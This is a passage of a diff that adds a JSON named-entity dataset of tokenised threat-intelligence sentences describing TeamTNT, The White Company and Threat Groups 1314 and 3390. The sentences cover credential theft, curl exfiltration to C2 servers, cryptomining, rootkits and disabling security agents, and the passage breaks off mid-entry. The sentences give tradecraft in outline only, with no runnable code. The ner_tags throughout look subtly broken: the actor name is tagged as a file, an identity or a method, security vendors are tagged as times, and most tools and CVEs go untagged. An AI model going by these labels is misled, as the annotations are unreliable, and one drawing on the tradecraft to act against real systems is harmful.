"O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "removed", + "system", + "logs", + "from", + "<code>/var/log/syslog</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "leveraged", + "AWS", + "CLI", + "to", + "enumerate", + "cloud", + "environments", + "with", + "compromised", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "queried", + "the", + "AWS", + "instance", + "metadata", + "service", + "for", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "executed", + "Hildegard", + "through", + "the", + "kubelet", + "API", + "run", + "command", + "and", + "by", + "executing", + "commands", + "on", + "running", + "containers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "checked", + "for", + "running", + "containers", + "with", + "<code>docker", + "ps</code>", + "and", + "for", + "specific", + "container", + "names", + "with", + "<code>docker", + "inspect</code>.", + "TeamTNT", + "has", + "also", + "searched", + "for", + "Kubernetes", + "pods", + "running", + "in", + "a", + "local", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "unsecured", + "AWS", + "credentials", + "and", + "Docker", + "API", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "a", + "script", + "that", + "decodes", + "a", + "Base64-encoded", + "version", + "of", + "WeaveWorks", + "Scope." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "deployed", + "different", + "types", + "of", + "containers", + "into", + "victim", + "environments", + "to", + "facilitate", + "execution.", + "TeamTNT", + "has", + "also", + "transferred", + "cryptocurrency", + "mining", + "software", + "to", + "Kubernetes", + "clusters", + "discovered", + "within", + "local", + "IP", + "address", + "ranges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "disabled", + "<code>iptables</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "disabled", + "and", + "uninstalled", + "security", + "tools", + "such", + "as", + "Alibaba,", + "Tencent,", + "and", + "BMC", + "cloud", + "monitoring", + "agents", + "on", + "cloud-based", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "obtained", + "domains", + "to", + "host", + "their", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "encrypted", + "its", + "binaries", + "via", + "AES", + "and", + "encoded", + "files", + "using", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "deployed", + "privileged", + "containers", + "that", + "mount", + "the", + "filesystem", + "of", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "sent", + "locally", + "staged", + "files", + "with", + "collected", + "credentials", + "to", + "C2", + "servers", + "using", + "cURL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "open-source", + "tools", + "such", + "as", + "Weave", + "Scope", + "to", + "target", + "exposed", + "Docker", + "API", + "ports", + "and", + "gain", + "initial", + "access", + "to", + "victim", + "environments.", + "TeamTNT", + "has", + "also", + "targeted", + "exposed", + "kubelets", + "for", + "Kubernetes", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "a", + "payload", + "that", + "removes", + "itself", + "after", + "running.", + "TeamTNT", + "also", + "has", + "deleted", + "locally", + "staged", + "files", + "for", + "collecting", + "credentials", + "or", + "scan", + "results", + "for", + "local", + "IP", + "addresses", + "after", + "exfiltrating", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "a", + "script", + "that", + "checks", + "`/proc/*/environ`", + "for", + "environment", + "variables", + "related", + "to", + "AWS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "the", + "<code>curl</code>", + "and", + "<code>wget</code>", + "commands", + "as", + "well", + "as", + "batch", + "scripts", + "to", + "download", + "new", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "modified", + "the", + "permissions", + "on", + "binaries", + "with", + "<code>chattr</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "created", + "local", + "privileged", + "users", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "aggregated", + "collected", + "credentials", + "in", + "text", + "files", + "before", + "exfiltrating." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "relied", + "on", + "users", + "to", + "download", + "and", + "execute", + "malicious", + "Docker", + "images." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "developed", + "custom", + "malware", + "such", + "as", + "Hildegard." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "disguised", + "their", + "scripts", + "with", + "docker-related", + "file", + "names." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "replaced", + ".dockerd", + "and", + ".dockerenv", + "with", + "their", + "own", + "scripts", + "and", + "cryptocurrency", + "mining", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "masscan", + "to", + "search", + "for", + "open", + "Docker", + "API", + "ports", + "and", + "Kubernetes", + "clusters.", + "TeamTNT", + "has", + "also", + "used", + "malware", + "that", + "utilizes", + "zmap", + "and", + "zgrab", + "to", + "search", + "for", + "vulnerable", + "services", + "in", + "cloud", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "attached", + "VGA", + "devices", + "using", + "lspci." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "executed", + "PowerShell", + "commands", + "in", + "batch", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "unsecured", + "SSH", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "rival", + "malware", + "and", + "removes", + "it", + "if", + "found.", + "TeamTNT", + "has", + "also", + "searched", + "for", + "running", + "processes", + "containing", + "the", + "strings", + "aliyun", + "or", + "liyun", + "to", + "identify", + "machines", + "running", + "Alibaba", + "Cloud", + "Security", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "added", + "batch", + "scripts", + "to", + "the", + "startup", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "established", + "tmate", + "sessions", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "deployed", + "XMRig", + "Docker", + "images", + "to", + "mine", + "cryptocurrency.", + "TeamTNT", + "has", + "also", + "infected", + "Docker", + "containers", + "and", + "Kubernetes", + "clusters", + "with", + "XMRig,", + "and", + "used", + "RainbowMiner", + "and", + "lolMiner", + "for", + "mining", + "cryptocurrency." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Purp", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "rootkits", + "such", + "as", + "the", + "open-source", + "Diamorphine", + "rootkit", + "and", + "their", + "custom", + "bots", + "to", + "hide", + "cryptocurrency", + "mining", + "activities", + "on", + "the", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "SSH", + "to", + "connect", + "back", + "to", + "victim", + "machines.", + "TeamTNT", + "has", + "also", + "used", + "SSH", + "to", + "transfer", + "tools", + "and", + "payloads", + "onto", + "victim", + "hosts", + "and", + "execute", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "added", + "RSA", + "keys", + "in", + "<code>authorized_keys</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "scanned", + "specific", + "lists", + "of", + "target", + "IP", + "addresses." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "security", + "products", + "on", + "infected", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "UPX", + "and", + "Ezuri", + "packer", + "to", + "pack", + "its", + "binaries." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "system", + "version,", + "architecture,", + "disk", + "partition,", + "logical", + "volume,", + "and", + "hostname", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "enumerated", + "the", + "host", + "machine’s", + "IP", + "address." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "run", + "<code>netstat", + "-anp</code>", + "to", + "search", + "for", + "rival", + "malware", + "connections.", + "TeamTNT", + "has", + "also", + "used", + "`libprocesshider`", + "to", + "modify", + "<code>/etc/ld.so.preload</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "searched", + "for", + "services", + "such", + "as", + "Alibaba", + "Cloud", + "Security's", + "aliyun", + "service", + "and", + "BMC", + "Helix", + "Cloud", + "Security's", + "bmc-agent", + "service", + "in", + "order", + "to", + "disable", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "created", + "system", + "services", + "to", + "execute", + "cryptocurrency", + "mining", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "established", + "persistence", + "through", + "the", + "creation", + "of", + "a", + "cryptocurrency", + "mining", + "system", + "service", + "using", + "<code>systemctl</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "shell", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "uploaded", + "backdoored", + "Docker", + "images", + "to", + "Docker", + "Hub." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "scanned", + "for", + "vulnerabilities", + "in", + "IoT", + "devices", + "and", + "other", + "related", + "resources", + "such", + "as", + "the", + "Docker", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "the", + "`curl`", + "command", + "to", + "send", + "credentials", + "over", + "HTTP", + "and", + "the", + "`curl`", + "and", + "`wget`", + "commands", + "to", + "download", + "new", + "software.", + "TeamTNT", + "has", + "also", + "used", + "a", + "custom", + "user", + "agent", + "HTTP", + "header", + "in", + "shell", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "leveraged", + "iplogger.org", + "to", + "send", + "collected", + "data", + "back", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "batch", + "scripts", + "to", + "download", + "tools", + "and", + "executing", + "cryptocurrency", + "miners." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "TeamTNT", + "has", + "used", + "malware", + "that", + "adds", + "cryptocurrency", + "miners", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "taken", + "advantage", + "of", + "a", + "known", + "vulnerability", + "in", + "Microsoft", + "Word", + "(CVE", + "2012-0158)", + "to", + "execute", + "code." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-Features", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "the", + "ability", + "to", + "delete", + "its", + "malware", + "entirely", + "from", + "the", + "target", + "system." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "used", + "phishing", + "lure", + "documents", + "that", + "trick", + "users", + "into", + "opening", + "them", + "and", + "infecting", + "their", + "computers." + ], + "ner_tags": [ + "O", + "I-Org", + "I-Org", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "checked", + "for", + "specific", + "antivirus", + "products", + "on", + "the", + "target’s", + "computer,", + "including", + "Kaspersky,", + "Quick", + "Heal,", + "AVG,", + "BitDefender,", + "Avira,", + "Sophos,", + "Avast!,", + "and", + "ESET." + ], + "ner_tags": [ + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "obfuscated", + "their", + "payloads", + "through", + "packing." + ], + "ner_tags": [ + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "sent", + "phishing", + "emails", + "with", + "malicious", + "Microsoft", + "Word", + "attachments", + "to", + "victims." + ], + "ner_tags": [ + "O", + "I-Org", + "I-Org", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "White", + "Company", + "has", + "checked", + "the", + "current", + "date", + "on", + "the", + "victim", + "system." + ], + "ner_tags": [ + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-1314", + "actors", + "used", + "compromised", + "domain", + "credentials", + "for", + "the", + "victim's", + "endpoint", + "management", + "platform,", + "Altiris,", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-1314", + "actors", + "mapped", + "network", + "drives", + "using", + "<code>net", + "use</code>." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-1314", + "actors", + "used", + "a", + "victim's", + "endpoint", + "management", + "platform,", + "Altiris,", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-1314", + "actors", + "spawned", + "shells", + "on", + "remote", + "systems", + "on", + "a", + "victim", + "network", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "RAR", + "to", + "compress,", + "encrypt,", + "and", + "password-protect", + "files", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "use", + "at", + "to", + "schedule", + "tasks", + "to", + "run", + "self-extracting", + "RAR", + "archives,", + "which", + "install", + "HTTPBrowser", + "or", + "PlugX", + "on", + "other", + "victims", + "on", + "a", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "ran", + "a", + "command", + "to", + "compile", + "an", + "archive", + "of", + "file", + "types", + "of", + "interest", + "from", + "the", + "victim", + "user's", + "directories." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "can", + "use", + "a", + "public", + "UAC", + "bypass", + "method", + "to", + "elevate", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "obtained", + "stolen", + "valid", + "certificates,", + "including", + "from", + "VMProtect", + "and", + "the", + "Chinese", + "instant", + "messaging", + "application", + "Youdu,", + "for", + "their", + "operations." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "compromised", + "the", + "Able", + "Desktop", + "installer", + "to", + "gain", + "access", + "to", + "victim's", + "environments." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "performed", + "DLL", + "search", + "order", + "hijacking", + "to", + "execute", + "their", + "payload." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "DLL", + "side-loading,", + "including", + "by", + "using", + "legitimate", + "Kaspersky", + "antivirus", + "variants", + "as", + "well", + "as", + "`rc.exe`,", + "a", + "legitimate", + "Microsoft", + "Resource", + "Compiler." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "actors", + "have", + "split", + "RAR", + "files", + "for", + "exfiltration", + "into", + "parts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "ran", + "a", + "command", + "to", + "compile", + "an", + "archive", + "of", + "file", + "types", + "of", + "interest", + "from", + "the", + "victim", + "user's", + "directories." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "execution,", + "Threat", + "Group-3390", + "malware", + "deobfuscates", + "and", + "decompresses", + "code", + "that", + "was", + "encoded", + "with", + "Metasploit’s", + "shikata_ga_nai", + "encoder", + "as", + "well", + "as", + "compressed", + "with", + "LZNT1", + "compression." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + "appcmd.exe", + "to", + "disable", + "logging", + "on", + "a", + "victim", + "server." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "registered", + "domains", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "extensively", + "used", + "strategic", + "web", + "compromises", + "to", + "target", + "victims." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "embedded", + "malicious", + "code", + "into", + "websites", + "to", + "screen", + "a", + "potential", + "victim's", + "IP", + "address", + "and", + "then", + "exploit", + "their", + "browser", + "if", + "they", + "are", + "of", + "interest." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Threat", + "Group-3390", + "tool", + "can", + "encrypt", + "payloads", + "using", + "XOR.", + "Threat", + "Group-3390", + "malware", + "is", + "also", + "obfuscated", + "using", + "Metasploit’s", + "shikata_ga_nai", + "encoder", + "as", + "well", + "as", + "compressed", + "with", + "LZNT1", + "compression." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "exploited", + "the", + "Microsoft", + "SharePoint", + "vulnerability", + "CVE-2019-0604", + "and", + "CVE-2021-26855,", + "CVE-2021-26857,", + "CVE-2021-26858,", + "and", + "CVE-2021-27065", + "in", + "Exchange", + "Server." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "I-Exp", + "O", + "B-Exp", + "B-Features", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "exploited", + "CVE-2018-0798", + "in", + "Equation", + "Editor." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "Group-3390", + "has", + "used", + 